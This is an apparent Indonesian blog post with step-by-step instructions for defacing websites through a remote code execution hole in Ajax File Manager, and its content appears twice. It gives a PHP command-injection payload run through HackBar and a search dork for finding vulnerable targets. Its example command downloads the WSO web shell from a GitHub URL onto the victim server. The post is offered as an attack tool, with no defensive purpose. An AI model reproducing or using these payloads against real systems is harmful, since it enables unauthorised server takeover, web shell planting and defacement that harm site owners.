Cara Deface Ajax File Manager Remote Code Execution
Langsung aja, yang harus disiapin adalah
1.HackBar , kalo saya pakai hackbar MOD (Klik disini)
*pakai browser mozilla firefox ya
2.exploit = foo=<?php error_reporting(0);print(system('commandnya'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>
3.dork : inurl:/ajaxfilemanager/ ext:php intitle:Ajax File Manager (kembangin)
, cara defacenya liat disini
exploitnya = foo=<?php error_reporting(0);print(system('commandnya'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>
contoh= foo=<?php error_reporting(0);print(system('wget https://raw.githubusercontent.com/faisa69/ToKeiChun-Shell/master/wso26.php'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>
lihat hasil di = inc/data.php
1.HackBar , kalo saya pakai hackbar MOD (Klik disini)
*pakai browser mozilla firefox ya
2.exploit = foo=<?php error_reporting(0);print(system('commandnya'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>
3.dork : inurl:/ajaxfilemanager/ ext:php intitle:Ajax File Manager (kembangin)
, cara defacenya liat disini
exploitnya = foo=<?php error_reporting(0);print(system('commandnya'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>
contoh= foo=<?php error_reporting(0);print(system('wget https://raw.githubusercontent.com/faisa69/ToKeiChun-Shell/master/wso26.php'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>
lihat hasil di = inc/data.php
Post a Comment